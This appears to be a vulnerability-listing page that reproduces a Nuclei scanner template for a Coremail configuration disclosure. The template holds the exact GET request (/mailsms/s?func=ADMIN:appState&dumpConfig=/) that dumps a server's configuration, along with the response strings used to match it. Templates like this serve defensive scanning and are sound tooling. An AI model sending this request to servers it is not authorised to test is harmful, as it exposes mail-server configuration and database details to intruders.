coremail-config-disclosure: Coremail - Config Discovery

日期: 2025-08-01 | 影响软件: coremail config | POC: 已公开

漏洞描述

Coremail configuration information was discovered.

PoC代码[已公开]

id: coremail-config-disclosure

info:
  name: Coremail - Config Discovery
  author: princechaddha
  severity: high
  description: Coremail configuration information was discovered.
  reference:
    - https://www.secpulse.com/archives/107611.html
  metadata:
    max-request: 1
  tags: config,exposure,coremail

http:
  - method: GET
    path:
      - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<object name=\"cm_md_db\">"
          - 'containerDefinitions'
          - '<string name="User">coremail</string>'
          - '<string name="EnableCoremailSmtp">'
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206241780b3b8fb4bf50ae9cd85c25089946db96bba4ac8564a18d8683a8c61c38022100dc32c232561e0415d0352d91279bdda6ddffdb262ca6590e4fcb6a1eec69c082:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/exposures/configs/coremail-config-disclosure.yaml